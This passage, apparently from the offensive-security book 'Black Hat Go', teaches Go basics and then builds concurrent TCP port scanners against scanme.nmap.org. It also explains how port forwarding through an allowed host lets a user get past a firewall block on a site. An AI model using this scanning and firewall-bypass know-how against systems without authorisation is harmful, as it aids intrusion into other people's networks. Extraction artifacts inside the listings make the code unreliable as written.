$GOPATH/src (remember, you created this workspace during installation) as main.go: package main import ( "fmt" ) func main() { fmt.Println("Hello, Black Hat Gophers!") } From the command line, within the directory containing this file, execute go run main.go. You should see Hello, Black Hat Gophers! printed to your screen. The go build Command Note that go run executed your file, but it didn’t produce a standalone binary file. That’s where go build comes in. The go build command com- piles your application, including any packages and their dependencies, Go Fundamentals 7 without installing the results. It creates a binary file on disk but doesn’t execute your program. The files it creates follow reasonable naming con- ventions, but it’s not uncommon to change the name of the created binary file by using the -o output command line option. Rename main.go from the previous example to hello.go. In a terminal window, execute go build hello.go. If everything goes as intended, this command should create an executable file with the name hello. Now enter this command: $ ./hello Hello, Black Hat Gophers! This should run the standalone binary file. By default, the produced binary file contains debugging information and the symbol table. This can bloat the size of the file. To reduce the file size, you can include additional flags during the build process to strip this information from the binary. For example, the following command will reduce the binary size by approximately 30 percent: $ go build -ldflags "-w -s" Having a smaller binary will make it more efficient to transfer or embed while pursuing your nefarious endeavors. Cross-Compiling Using go build works great for running a binary on your current system or one of identical architecture, but what if you want to create a binary that can run on a different architecture? That’s where cross-compiling comes in. Cross-compiling is one of the coolest aspects of Go, as no other language can do it as easily. The build command allows you to cross-compile your pro- gram for multiple operating systems and architectures. Reference the offi- cial Go documentation at https://golang.org/doc/install/source#environment/ for further details regarding allowable combinations of compatible operat- ing system and architecture compilation types. To cross-compile, you need to set a constraint. This is just a means to pass information to the build command about the operating system and architecture for which you’d like to compile your code. These constraints include GOOS (for the operating system) and GOARCH (for the architecture). You can introduce build constraints in three ways: via the command line, code comments, or a file suffix naming convention. We’ll discuss the command line method here and leave the other two methods for you to research if you wish. Let’s suppose that you want to cross-compile your previous hello.go program residing on a macOS system so that it runs on a Linux 64-bit 8 Chapter 1 architecture. You can accomplish this via the command line by setting the GOOS and GOARCH constraints when running the build command: $ GOOS="linux" GOARCH="amd64" go build hello.go $ ls hello hello.go $ file hello hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped The output confirms that the resulting binary is a 64-bit ELF (Linux) file. The cross-compilation process is much simpler in Go than in just about any other modern programming language. The only real “gotcha” happens when you try to cross-compile applications that use native C bindings. We’ll stay out of the weeds and let you dig into those challenges independently. Depending on the packages you import and the projects you develop, you may not have to worry about that very often. The go doc Command The go doc command lets you interrogate documentation about a package, function, method, or variable. This documentation is embedded as com- ments through your code. Let’s take a look at how to obtain details about the fmt.Println() function: $ go doc fmt.Println func Println(a ...interface{}) (n int, err error) Println formats using the default formats for its operands and writes to standard output. Spaces are always added between operands and a newline is appended. It returns the number of bytes written and any write error encountered. The output that go doc produces is taken directly out of the source code comments. As long as you adequately comment your packages, functions, methods, and variables, you’ll be able to automatically inspect the docu- mentation via the go doc command. The go get Command Many of the Go programs that you’ll develop in this book will require third- party packages. To obtain package source code, use the go get command. For instance, let’s assume you’ve written the following code that imports the stacktitan/ldapauth package: package main import ( "fmt" "net/http" u "github.com/stacktitan/ldapauth" ) Go Fundamentals 9 Even though you’ve imported the stacktitan/ldapauth package u, you can’t access the package quite yet. You first have to run the go get com- mand. Using go get github.com/stacktitan/ldapauth downloads the actual package and places it within the $GOPATH/src directory. The following directory tree illustrates the placement of the ldapauth package within your GOPATH workspace: $ tree src/github.com/stacktitan/ u src/github.com/stacktitan/ └── ldapauth ├── LICENSE ├── README.md └── ldap_auth.go Notice that the path u and the imported package name are constructed in a way that avoids assigning the same name to multiple packages. Using github.com/stacktitan as a preface to the actual package name ldapauth ensures that the package name remains unique. Although Go developers traditionally install dependencies with go get, problems can arise if those dependent packages receive updates that break backward compatibility. Go has introduced two separate tools—dep and mod—to lock dependencies in order to prevent backward compatibil- ity issues. However, this book almost exclusively uses go get to pull down dependencies. This will help avoid inconsistencies with ongoing depen- dency management tooling and hopefully make it easier for you to get the examples up and running. The go fmt Command The go fmt command automatically formats your source code. For example, running go fmt /path/to/your/package will style your code by enforcing the use of proper line breaks, indentation, and brace alignment. Adhering to arbitrary styling preferences might seem strange at first, particularly if they differ from your habits. However, you should find this consistency refreshing over time, as your code will look similar to other third-party packages and feel more organized. Most IDEs contain hooks that will automatically run go fmt when you save your file, so you don’t need to explicitly run the command. The golint and go vet Commands Whereas go fmt changes the syntactical styling of your code, golint reports style mistakes such as missing comments, variable naming that doesn’t fol- low conventions, useless type specifications, and more. Notice that golint is a standalone tool, and not a subcommand of the main go binary. You’ll need to install it separately by using go get -u golang.org/x/lint/golint. Similarly, go vet inspects your code and uses heuristics to identify suspi- cious constructs, such as calling Printf() with the incorrect format string types. The go vet command attempts to identify issues, some of which might be legitimate bugs, that a compiler might miss. 10 Chapter 1 Go Playground The Go Playground is an execution environment hosted at https://play.golang .org/ that provides a web-based frontend for developers to quickly develop, test, execute, and share snippets of Go code. The site makes it easy to try out various Go features without having to install or run Go on your local system. It’s a great way to test snippets of code before integrating them within your projects. It also allows you to simply play with various nuances of the language in a preconfigured environment. It’s worth noting that the Go Playground restricts you from calling certain dangerous functions to prevent you from, for example, executing operating-system commands or interacting with third-party websites. Other Commands and Tools Although we won’t explicitly discuss other tools and commands, we encourage you to do your own research. As you create increasingly com- plex projects, you’re likely to run into a desire to, for example, use the go test tool to run unit tests and benchmarks, cover to check for test cover- age, imports to fix import statements, and more. Understanding Go Syntax An exhaustive review of the entire Go language would take multiple chapters, if not an entire book. This section gives a brief overview of Go’s syntax, partic - ularly relative to data types, control structures, and common patterns. This should act as a refresher for casual Go coders and an introduction for those new to the language. For an in-depth, progressive review of the language, we recommend that you work through the excellent A Tour of Go (https://tour.golang.org/) tutorial. It’s a comprehensive, hands-on discussion of the language broken into bite-sized lessons that use an embedded playground to enable you to try out each of the concepts. The language itself is a much cleaner version of C that removes a lot of the lower-level nuances, resulting in better readability and easier adoption. Data Types Like most modern programming languages, Go provides a variety of primi- tive and complex data types. Primitive types consist of the basic building blocks (such as strings, numbers, and booleans) that you’re accustomed to in other languages. Primitives make up the foundation of all information used within a program. Complex data types are user-defined structures com- posed of a combination of one or more primitive or other complex types. Go Fundamentals 11 Primitive Data Types The primitive types include bool, string, int, int8, int16, int32, int64, uint, uint8, uint16, uint32, uint64, uintptr, byte, rune, float32, float64, complex64, and complex128. You typically declare a variable’s type when you define it. If you don’t, the system will automatically infer the variable’s data type. Consider the following examples: var x = "Hello World" z := int(42) In the first example, you use the keyword var to define a variable named x and assign to it the value "Hello World". Go implicitly infers x to be a string, so you don’t have to declare that type. In the second example, you use the := operator to define a new variable named z and assign to it an integer value of 42. There really is no difference between the two opera- tors. We’ll use both throughout this book, but some people feel that the := operator is an ugly symbol that reduces readability. Choose whatever works best for you. In the preceding example, you explicitly wrap the 42 value in an int call to force a type on it. You could omit the int call but would have to accept whatever type the system automatically uses for that value. In some cases, this won’t be the type you intended to use. For instance, perhaps you want 42 to be represented as an unsigned integer, rather than an int type, in which case you’d have to explicitly wrap the value. Slices and Maps Go also has more-complex data types, such as slices and maps. Slices are like arrays that you can dynamically resize and pass to functions more effi- ciently. Maps are associative arrays, unordered lists of key/value pairs that allow you to efficiently and quickly look up values for a unique key. There are all sorts of ways to define, initialize, and work with slices and maps. The following example demonstrates a common way to define both a slice s and a map m and add elements to both: var s = make([]string, 0) var m = make(map[string]string) s = append(s, "some string") m["some key"] = "some value" This code uses the two built-in functions: make() to initialize each variable and append() to add a new item to a slice. The last line adds the key/value pair of some key and some value to the map m. We recommend that you read the official Go documentation to explore all the methods for defining and using these data types. 12 Chapter 1 Pointers, Structs, and Interfaces A pointer points to a particular area in memory and allows you to retrieve the value stored there. As you do in C, you use the & operator to retrieve the address in memory of some variable, and the * operator to dereference the address. The following example illustrates this: u var count = int(42) v ptr := &count w fmt.Println(*ptr) x *ptr = 100 y fmt.Println(count) The code defines an integer, count u, and then creates a pointer v by using the & operator. This returns the address of the count variable. You dereference the variable w while making a call to fmt.Println() to log the value of count to stdout. You then use the * operator x to assign a new value to the memory location pointed to by ptr. Because this is the address of the count variable, the assignment changes the value of that variable, which you confirm by printing it to the screen y. You use the struct type to define new data types by specifying the type’s associated fields and methods. For example, the following code defines a Person type: u type Person struct { v Name string w Age int } x func (p *Person) SayHello() { fmt.Println("Hello,", p.Namey) } func main() { var guy = newz(Person) { guy.Name = "Dave" | guy.SayHello() } The code uses the type keyword u to define a new struct containing two fields: a string named Name v and an int named Age w. You define a method, SayHello(), on the Person type assigned to variable p x. The method prints a greeting message to stdout by looking at the struct, p y, that received the call. Think of p as a reference to self or this in other languages. You also define a function, main(), which acts as the program’s entry point. This function uses the new keyword z to initialize a new Person. It assigns the name Dave to the person { and then tells the person to SayHello() |. Structs lack scoping modifiers—such as private, public, or protected— that are commonly used in other languages to control access to their members. Instead, Go uses capitalization to determine scope: types and fields that begin with a capital letter are exported and accessible outside Go Fundamentals 13 the package, whereas those starting with a lowercase letter are private, accessible only within the package. You can think of Go’s interface type as a blueprint or a contract. This blueprint defines an expected set of actions that any concrete implementa- tion must fulfill in order to be considered a type of that interface. To define an interface, you define a set of methods; any data type that contains those methods with the correct signatures fulfills the contract and is considered a type of that interface. Let’s take a look at an example: u type Friend interface { v SayHello() } In this sample, you’ve defined an interface called Friend u that requires one method to be implemented: SayHello() v. That means that any type that implements the SayHello() method is a Friend. Notice that the Friend interface doesn’t actually implement that function—it just says that if you’re a Friend, you need to be able to SayHello(). The following function, Greet(), takes a Friend interface as input and says hello in a Friend-specific way: func Greetu (f Friendv) { f.SayHello() } You can pass any Friend type to the function. Luckily, the Person type used in the previous example can SayHello()—it’s a Friend. Therefore, if a function named Greet() u, as shown in the preceding code, expects a Friend as an input parameter v, you can pass it a Person, like this: func main() { var guy = new(Person) guy.Name = "Dave" Greet(guy) } Using interfaces and structs, you can define multiple types that you can pass to the same Greet() function, so long as these types implement the Friend interface. Consider this modified example: u type Dog struct {} func (d *Dog) SayHello()v { fmt.Println("Woof woof") } func main() { var guy = new(Person) guy.Name = "Dave" w Greet(guy) var dog = new(Dog) x Greet(dog) } 14 Chapter 1 The example shows a new type, Dog u, that is able to SayHello() v and, therefore, is a Friend. You are able to Greet() both a Person w and a Dog x, since both are capable of SayHello(). We’ll cover interfaces multiple times throughout the book to help you better understand the concept. Control Structures Go contains slightly fewer control structures than other modern languages. Despite that, you can still accomplish complex processing, including condi- tionals and loops, with Go. Go’s primary conditional is the if/else structure: if x == 1 { fmt.Println("X is equal to 1") } else { fmt.Println("X is not equal to 1") } Go’s syntax deviates slightly from the syntax of other languages. For instance, you don’t wrap the conditional check—in this case, x == 1—in parentheses. You must wrap all code blocks, even the preceding single-line blocks, in braces. Many other modern languages make the braces optional for single-line blocks, but they’re required in Go. For conditionals involving more than two choices, Go provides a switch statement. The following is an example: switch xu { case "foo"v: fmt.Println("Found foo") case "bar"w: fmt.Println("Found bar") defaultx: fmt.Println("Default case") } In this example, the switch statement compares the contents of a variable x u against various values—foo v and bar w—and logs a mes- sage to stdout if x matches one of the conditions. This example includes a default case x, which executes in the event that none of the other conditions match. Note that, unlike many other modern languages, your cases don’t have to include break statements. In other languages, execution often continues through each of the cases until the code reaches a break statement or the end of the switch. Go will execute no more than one matching or default case. Go also contains a special variation on the switch called a type switch that performs type assertions by using a switch statement. Type switches are useful for trying to understand the underlying type of an interface. Go Fundamentals 15 For example, you might use a type switch to retrieve the underlying type of an interface called i: func foo(iu interface{}) { switch v := i.(type)v { case int: fmt.Println("I'm an integer!") case string: fmt.Println("I'm a string!") default: fmt.Println("Unknown type!") } } This example uses special syntax, i.(type) v, to retrieve the type of the i interface variable u. You use this value in a switch statement in which each case matches against a specific type. In this example, your cases check for int or string primitive types, but you could very well check for pointers or user-defined struct types, for instance. Go’s last flow control structure is the for loop. The for loop is Go’s exclusive construct for performing iteration or repeating sections of code. It might seem odd to not have conventions such as do or while loops at your disposal, but you can re-create them by using variations of the for loop syn- tax. Here’s one variation of a for loop: for i := 0; i < 10; i++ { fmt.Println(i) } The code loops through numbers 0 to 9, printing each number to stdout. Notice the semicolons in the first line. Unlike many other languages, which use semicolons as line delimiters, Go uses them for various control structures to perform multiple distinct, but related, subtasks in a single line of code. The first line uses the semicolons to separate the initialization logic (i := 0), the conditional expression (i < 10), and the post statement (i++). This struc- ture should be very, very familiar to anyone who has coded in any modern language, as it closely follows the conventions of those languages. The following example shows a slight variation of the for loop that loops over a collection, such as a slice or a map: u nums := []int{2,4,6,8} for idxv, valw := rangex nums { fmt.Println(idx, val) } In this example, you initialize a slice of integers named nums u. You then use the keyword range x within the for loop to iterate over the slice. The range keyword returns two values: the current index v and a copy of the current value w at that index. If you don’t intend to use the index, you could replace idx in the for loop with an underscore to tell Go you won’t need it. 16 Chapter 1 You can use this exact same looping logic with maps as well to return each key/value pair. Concurrency Much like the control structures already reviewed, Go has a much simpler concurrency model than other languages. To execute code concurrently, you can use goroutines, which are functions or methods that can run simul- taneously. These are often described as lightweight threads because the cost of creating them is minimal when compared to actual threads. To create a goroutine, use the go keyword before the call to a method or function you wish to run concurrently: u func f() { fmt.Println("f function") } func main() { v go f() time.Sleep(1 * time.Second) fmt.Println("main function") } In this example, you define a function, f() u, that you call in your main() function, the program’s entry point. You preface the call with the keyword go v, meaning that the program will run function f() concur- rently; in other words, the execution of your main() function will continue without waiting for f() to complete. You then use a time.Sleep(1 * time .Second) to force the main() function to pause temporarily so that f() can complete. If you didn’t pause the main() function, the program would likely exit prior to the completion of function f(), and you would never see its results displayed to stdout. Done correctly, you’ll see messages printed to stdout indicating that you’ve finished executing both the f() and main() functions. Go contains a data type called channels that provide a mechanism through which goroutines can synchronize their execution and communi- cate with one another. Let’s look at an example that uses channels to dis- play the length of different strings and their sum simultaneously: u func strlen(s string, c chan int) { v c <- len(s) } func main() { w c := make(chan int) x go strlen("Salutations", c) go strlen("World", c) y x, y := <-c, <-c fmt.Println(x, y, x+y) } Go Fundamentals 17 First, you define and use a variable c of type chan int. You can define channels of various types, depending on the type of data you intend to pass via the channel. In this case, you’ll be passing the lengths of various strings as integer values between goroutines, so you should use an int channel. Notice a new operator: <-. This operator indicates whether the data is flowing to or from a channel. You can think of this as the equivalent of placing items into a bucket or removing items from a bucket. The function you define, strlen() u, accepts a word as a string, as well as a channel that you’ll use for synchronizing data. The function contains a single statement, c <- len(s) v, which uses the built-in len() function to determine the length of the string, and then puts the result into the c channel by using the <- operator. The main() function pieces everything together. First, you issue a call to make(chan int) w to create the integer channel. You then issue multiple concurrent calls to the strlen() function by using the go keyword x, which spins up multiple goroutines. You pass to the strlen() function two string values, as well as the channel into which you want the results placed. Lastly, you read data from the channel by using the <- operator y, this time with data flowing from the channel. This means you’re taking items out of your bucket, so to speak, and assigning those values to the variables x and y. Note that execution blocks at this line until adequate data can be read from the channel. When the line completes, you display the length of each string as well as their sum to stdout. In this example, it produces the following output: 5 11 16 This may seem overwhelming, but it’s key to highlight basic concurrency patterns, as Go shines in this area. Because concurrency and parallelism in Go can become rather complicated, feel free to explore on your own. Throughout this book, we’ll talk about more realistic and complicated implementations of concurrency as we introduce buffered channels, wait groups, mutexes, and more. Error Handling Unlike most other modern programming languages, Go does not include syntax for try/catch/finally error handling. Instead, it adopts a minimalistic approach that encourages you to check for errors where they occur rather than allowing them to “bubble up” to other functions in the call chain. Go defines a built-in error type with the following interface declaration: type error interface { Error() string } 18 Chapter 1 This means you can use any data type that implements a method named Error(), which returns a string value, as an error. For example, here’s a custom error you could define and use throughout your code: u type MyError string func (e MyError) Error() stringv { return string(e) } You create a user-defined string type named MyError u and implement an Error() string method v for the type. When it comes to error handling, you’ll quickly get accustomed to the following pattern: func foo() error { return errors.New("Some Error Occurred") } func main() { if err := foo()u;err != nilv { // Handle the error } } You’ll find that it’s fairly common for functions and methods to return at least one value. One of these values is almost always an error. In Go, the error returned may be a value of nil, indicating that the function generated no error and everything seemingly ran as expected. A non-nil value means something broke in the function. Thus, you can check for errors by using an if statement, as shown in the main() function. You’ll typically see multiple statements, separated by a semicolon. The first statement calls the function and assigns the resulting error to a variable u. The second statement then checks whether that error is nil v. You use the body of the if statement to handle the error. You’ll find that philosophies differ on the best way to handle and log errors in Go. One of the challenges is that, unlike other languages, Go’s built-in error type doesn’t implicitly include a stack trace to help you pin- point the error’s context or location. Although you can certainly generate one and assign it to a custom type in your application, its implementation is left up to the developers. This can be a little annoying at first, but you can manage it through proper application design. Handling Structured Data Security practitioners will often write code that handles structured data, or data with common encoding, such as JSON or XML. Go contains standard packages for data encoding. The most common packages you’re likely to use include encoding/json and encoding/xml. Both packages can marshal and unmarshal arbitrary data structures, which means they can turn strings to structures, and structures to strings. Go Fundamentals 19 Let’s look at the following sample, which serializes a structure to a byte slice and then subsequently deserializes the byte slice back to a structure: u type Foo struct { Bar string Baz string } func main() { v f := Foo{"Joe Junior", "Hello Shabado"} b, _w := json.Marshalx(fy) z fmt.Println(string(b)) json.Unmarshal(b{, &f|) } This code (which deviates from best practices and ignores possible errors) defines a struct type named Foo u. You initialize it in your main() function v and then make a call to json.Marshal() x, passing it the Foo instance y. This Marshal() method encodes the struct to JSON, returning a byte slice w that you subsequently print to stdout z. The output, shown here, is a JSON-encoded string representation of our Foo struct: {"Bar":"Joe Junior","Baz":"Hello Shabado"} Lastly, you take that same byte slice { and decode it via a call to json .Unmarshal(b, &f). This produces a Foo struct instance |. Dealing with XML is nearly identical to this process. When working with JSON and XML, you’ll commonly use field tags, which are metadata elements that you assign to your struct fields to define how the marshaling and unmarshaling logic can find and treat the affili- ated elements. Numerous variations of these field tags exist, but here is a short example that demonstrates their usage for handling XML: type Foo struct { Bar string `xml:"id,attr"` Baz string `xml:"parent>child"` } The string values, wrapped in backticks and following the struct fields, are field tags. Field tags always begin with the tag name (xml in this case), followed by a colon and the directive enclosed in double quotes. The direc- tive defines how the fields should be handled. In this case, you are supply- ing directives that declare that Bar should be treated as an attribute named id, not an element, and that Baz should be found in a subelement of parent, named child. If you modify the previous JSON example to now encode the structure as XML, you would see the following result: <Foo id="Joe Junior"><parent><child>Hello Shabado</child></parent></Foo> 20 Chapter 1 The XML encoder reflectively determines the names of elements, using the tag directives, so each field is handled according to your needs. Throughout this book, you’ll see these field tags used for dealing with other data serialization formats, including ASN.1 and MessagePack. We’ll also discuss some relevant examples of defining your own custom tags, specifically when you learn how to handle the Server Message Block (SMB) Protocol. Summary In this chapter, you set up your Go environment and learned about the fundamental aspects of the Go language. This is not an exhaustive list of all Go’s characteristics; the language is far too nuanced and large for us to cram it all into a single chapter. Instead, we included the aspects that will be most useful in the chapters that follow. We’ll now turn our atten- tion to practical applications of the language for security practitioners and hackers. Here we Go! Let’s begin our practical application of Go with the Transmission Control Protocol (TCP), the predominant standard for connection- oriented, reliable communications and the foundation of modern networking. TCP is everywhere, and it has well-documented libraries, code samples, and generally easy-to-understand packet flows. You must understand TCP to fully evaluate, analyze, query, and manipulate network traffic. As an attacker, you should understand how TCP works and be able to develop usable TCP constructs so that you can identify open/closed ports, recognize potentially errant results such as false-positives—for example, syn- flood protections—and bypass egress restrictions through port forwarding. In this chapter, you’ll learn basic TCP communications in Go; build a concur- rent, properly throttled port scanner; create a TCP proxy that can be used for port forwarding; and re-create Netcat’s “gaping security hole” feature. 2 T CP, SC A N N E R S, A N D PROX IE S 22 Chapter 2 Entire textbooks have been written to discuss every nuance of TCP, including packet structure and flow, reliability, communication reassem- bly, and more. This level of detail is beyond the scope of this book. For more details, you should read The TCP/IP Guide by Charles M. Kozierok (No Starch Press, 2005). Understanding the TCP Handshake For those who need a refresher, let’s review the basics. Figure 2-1 shows how TCP uses a handshake process when querying a port to determine whether the port is open, closed, or filtered. Server Client Server Client Server Client syn syn-ack ack Open Port syn rst Closed Port syn Filtered Port Firewall Timeout Figure 2-1: TCP handshake fundamentals If the port is open, a three-way handshake takes place. First, the client sends a syn packet, which signals the beginning of a communication. The server then responds with a syn-ack, or acknowledgment of the syn packet it received, prompting the client to finish with an ack, or acknowledgment of the server’s response. The transfer of data can then occur. If the port is closed, the server responds with a rst packet instead of a syn-ack. If the traffic is being filtered by a firewall, the client will typically receive no response from the server. TCP, Scanners, and Proxies 23 These responses are important to understand when writing network- based tools. Correlating the output of your tools to these low-level packet flows will help you validate that you’ve properly established a network con- nection and troubleshoot potential problems. As you’ll see later in this chapter, you can easily introduce bugs into your code if you fail to allow full client-server TCP connection handshakes to complete, resulting in inaccurate or misleading results. Bypassing Firewalls with Port Forwarding People can configure firewalls to prevent a client from connecting to certain servers and ports, while allowing access to others. In some cases, you can cir- cumvent these restrictions by using an intermediary system to proxy the con- nection around or through a firewall, a technique known as port forwarding. Many enterprise networks restrict internal assets from establishing HTTP connections to malicious sites. For this example, imagine a nefarious site called evil.com. If an employee attempts to browse evil.com directly, a fire- wall blocks the request. However, should an employee own an external system that’s allowed through the firewall (for example, stacktitan.com), that employee can leverage the allowed domain to bounce connections to evil.com. Figure 2-2 illustrates this concept. stacktitan.com Client evil.com Request stacktitan.com Request traverses firewall Traffic proxied to evil.com Figure 2-2: A TCP proxy A client connects, through a firewall, to the destination host stacktitan.com. This host is configured to forward connections to the host evil.com. While a firewall forbids direct connections to evil.com, a configuration such as the one shown here could allow a client to circumvent this protection mecha- nism and access evil.com. You can use port forwarding to exploit several restrictive network con- figurations. For example, you could forward traffic through a jump box to access a segmented network or access ports bound to restrictive interfaces. Writing a TCP Scanner One effective way to conceptualize the interaction of TCP ports is by imple- menting a port scanner. By writing one, you’ll observe the steps that occur in a TCP handshake, along with the effects of encountered state changes, which allow you to determine whether a TCP port is available or whether it responds with a closed or filtered state. 24 Chapter 2 Once you’ve written a basic scanner, you’ll write one that’s faster. A port scanner may scan several ports by using a single contiguous method; however, this can become time-consuming when your goal is to scan all 65,535 ports. You’ll explore how to use concurrency to make an inefficient port scanner more suitable for larger port-scanning tasks. You’ll also be able to apply the concurrency patterns that you’ll learn in this section in many other scenarios, both in this book and beyond. Testing for Port Availability The first step in creating the port scanner is understanding how to initiate a connection from a client to a server. Throughout this example, you’ll be con- necting to and scanning scanme.nmap.org, a service run by the Nmap project.1 To do this, you’ll use Go’s net package: net.Dial(network, address string). The first argument is a string that identifies the kind of connection to initiate. This is because Dial isn’t just for TCP; it can be used for creating connections that use Unix sockets, UDP, and Layer 4 protocols that exist only in your head (the authors have been down this road, and suffice it to say, TCP is very good). There are a few strings you can provide, but for the sake of brevity, you’ll use the string tcp. The second argument tells Dial(network, address string) the host to which you wish to connect. Notice it’s a single string, not a string and an int. For IPv4/TCP connections, this string will take the form of host:port. For example, if you wanted to connect to scanme.nmap.org on TCP port 80, you would supply scanme.nmap.org:80. Now you know how to create a connection, but how will you know if the connection is successful? You’ll do this through error checking: Dial(network, address string) returns Conn and error, and error will be nil if the connection is successful. So, to verify your connection, you just check whether error equals nil. You now have all the pieces needed to build a single port scanner, albeit an impolite one. Listing 2-1 shows how to put it together. (All the code list- ings at the root location of / exist under the provided github repo https:// github.com/blackhat-go/bhg/.) package main import ( "fmt" "net" ) func main() { _, err := net.Dial("tcp", "scanme.nmap.org:80") 1. This is a free service provided by Fyodor, the creator of Nmap, but when you’re scanning, be polite. He requests, “Try not to hammer on the server too hard. A few scans in a day is fine, but don’t scan 100 times a day.” TCP, Scanners, and Proxies 25 if err == nil { fmt.Println("Connection successful") } } Listing 2-1: A basic port scanner that scans only one port (/ch-2/dial/main.go) Run this code. You should see Connection successful, provided you have access to the great information superhighway. Performing Nonconcurrent Scanning Scanning a single port at a time isn’t useful, and it certainly isn’t efficient. TCP ports range from 1 to 65535; but for testing, let’s scan ports 1 to 1024. To do this, you can use a for loop: for i:=1; i <= 1024; i++ { } Now you have an int, but remember, you need a string as the second argument to Dial(network, address string). There are at least two ways to con- vert the integer into a string. One way is to use the string conversion package, strconv. The other way is to use Sprintf(format string, a ...interface{}) from the fmt package, which (similar to its C sibling) returns a string generated from a format string. Create a new file with the code in Listing 2-2 and ensure that both your loop and string generation work. Running this code should print 1024 lines, but don’t feel obligated to count them. package main import ( "fmt" ) func main() { for i := 1; i <= 1024; i++ { address := fmt.Sprintf("scanme.nmap.org:%d", i) fmt.Println(address) } } Listing 2-2: Scanning 1024 ports of scanme.nmap.org (/ch-2/tcp-scanner-slow/main.go) All that’s left is to plug the address variable from the previous code example into Dial(network, address string), and implement the same error checking from the previous section to test port availability. You should also add some logic to close the connection if it was successful; that way, connec- tions aren’t left open. FINishing your connections is just polite. To do that, you’ll call Close() on Conn. Listing 2-3 shows the completed port scanner. 26 Chapter 2 package main import ( "fmt" "net" ) func main() { for i := 1; i <= 1024; i++ { address := fmt.Sprintf("scanme.nmap.org:%d", i) conn, err := net.Dial("tcp", address) if err != nil { // port is closed or filtered. continue } conn.Close() fmt.Printf("%d open\n", i) } } Listing 2-3: The completed port scanner (/ch-2 /tcp-scanner-slow/main.go) Compile and execute this code to conduct a light scan against the target. You should see a couple of open ports. Performing Concurrent Scanning The previous scanner scanned multiple ports in a single go (pun intended). But your goal now is to scan multiple ports concurrently, which will make your port scanner faster. To do this, you’ll harness the power of goroutines. Go will let you create as many goroutines as your system can handle, bound only by available memory. The “Too Fast” Scanner Version The most naive way to create a port scanner that runs concurrently is to wrap the call to Dial(network, address string) in a goroutine. In the interest of learning from natural consequences, create a new file called scan-too-fast.go with the code in Listing 2-4 and execute it. package main import ( "fmt" "net" ) func main() { for i := 1; i <= 1024; i++ { go func(j int) { address := fmt.Sprintf("scanme.nmap.org:%d", j) conn, err := net.Dial("tcp", address) TCP, Scanners, and Proxies 27 if err != nil { return } conn.Close() fmt.Printf("%d open\n", j) }(i) } } Listing 2-4: A scanner that works too fast (/ch-2/tcp-scanner-too-fast/main.go) Upon running this code, you should observe the program exiting almost immediately: $ time ./tcp-scanner-too-fast ./tcp-scanner-too-fast 0.00s user 0.00s system 90% cpu 0.004 total The code you just ran launches a single goroutine per connection, and the main goroutine doesn’t know to wait for the connection to take place. Therefore, the code completes and exits as soon as the for loop finishes its iterations, which may be faster than the network exchange of packets between your code and the target ports. You may not get accurate results for ports whose packets were still in-flight. There are a few ways to fix this. One is to use WaitGroup from the sync package, which is a thread-safe way to control concurrency. WaitGroup is a struct type and can be created like so: var wg sync.WaitGroup Once you’ve created WaitGroup, you can call a few methods on the struct. The first is Add(int), which increases an internal counter by the number pro- vided. Next, Done() decrements the counter by one. Finally, Wait() blocks the execution of the goroutine in which it’s called, and will not allow further exe- cution until the internal counter reaches zero. You can combine these calls to ensure that the main goroutine waits for all connections to finish. Synchronized Scanning Using WaitGroup Listing 2-5 shows the same port-scanning program with a different imple- mentation of the goroutines. package main import ( "fmt" "net" "sync" ) 前沿信安资讯阵地 公众号:i nf osrc 28 Chapter 2 func main() { u var wg sync.WaitGroup for i := 1; i <= 1024; i++ { v wg.Add(1) go func(j int) { w defer wg.Done() address := fmt.Sprintf("scanme.nmap.org:%d", j) conn, err := net.Dial("tcp", address) if err != nil { return } conn.Close() fmt.Printf("%d open\n", j) }(i) } x wg.Wait() } Listing 2-5: A synchronized scanner that uses WaitGroup (/ch-2/tcp-scanner-wg-too-fast /main.go) This iteration of the code remains largely identical to our initial ver- sion. However, you’ve added code that explicitly tracks the remaining work. In this version of the program, you create sync.WaitGroup u, which acts as a synchronized counter. You increment this counter via wg.Add(1) each time you create a goroutine to scan a port v, and a deferred call to wg.Done() decrements the counter whenever one unit of work has been performed w. Your main() function calls wg.Wait(), which blocks until all the work has been done and your counter has returned to zero x. This version of the program is better, but still incorrect. If you run this multiple times against multiple hosts, you might see inconsistent results. Scanning an excessive number of hosts or ports simultaneously may cause network or system limitations to skew your results. Go ahead and change 1024 to 65535, and the destination server to your localhost in your code. If you want, you can use Wireshark or tcpdump to see how fast those connections are opened. Port Scanning Using a Worker Pool To avoid inconsistencies, you’ll use a pool of goroutines to manage the concurrent work being performed. Using a for loop, you’ll create a cer- tain number of worker goroutines as a resource pool. Then, in your main() “thread,” you’ll use a channel to provide work. To start, create a new program that has 100 workers, consumes a channel of int, and prints them to the screen. You’ll still use WaitGroup to block execution. Create your initial code stub for a main function. Above it, write the function shown in Listing 2-6. 前沿信安资讯阵地 公众号:i nf osrc TCP, Scanners, and Proxies 29 func worker(ports chan int, wg *sync.WaitGroup) { for p := range ports { fmt.Println(p) wg.Done() } } Listing 2-6: A worker function for processing work The worker(int, *sync.WaitGroup) function takes two arguments: a channel of type int and a pointer to a WaitGroup. The channel will be used to receive work, and the WaitGroup will be used to track when a single work item has been completed. Now, add your main() function shown in Listing 2-7, which will manage the workload and provide work to your worker(int, *sync.WaitGroup) function. package main import ( "fmt" "sync" ) func worker(ports chan int, wg *sync.WaitGroup) { u for p := range ports { fmt.Println(p) wg.Done() } } func main() { ports := makev(chan int, 100) var wg sync.WaitGroup w for i := 0; i < cap(ports); i++ { go worker(ports, &wg) } for i := 1; i <= 1024; i++ { wg.Add(1) x ports <- i } wg.Wait() y close(ports) } Listing 2-7: A basic worker pool (/ch-2/tcp-sync-scanner /main.go) First, you create a channel by using make() v. A second parameter, an int value of 100, is provided to make() here. This allows the channel to be buffered, which means you can send it an item without waiting for a receiver to read the item. Buffered channels are ideal for maintaining and track- ing work for multiple producers and consumers. You’ve capped the chan- nel at 100, meaning it can hold 100 items before the sender will block. 前沿信安资讯阵地 公众号:i nf osrc 30 Chapter 2 This is a slight performance increase, as it will allow all the workers to start immediately. Next, you use a for loop w to start the desired number of workers—in this case, 100. In the worker(int, *sync.WaitGroup) function, you use range u to continuously receive from the ports channel, looping until the channel is closed. Notice that you aren’t doing any work yet in the worker—that’ll come shortly. Iterating over the ports sequentially in the main() function, you send a port on the ports channel x to the worker. After all the work has been completed, you close the channel y. Once you build and execute this program, you’ll see your numbers printed to the screen. You might notice something interesting here: the numbers are printed in no particular order. Welcome to the wonderful world of parallelism. Multichannel Communication To complete the port scanner, you could plug in your code from earlier in the section, and it would work just fine. However, the printed ports would be unsorted, because 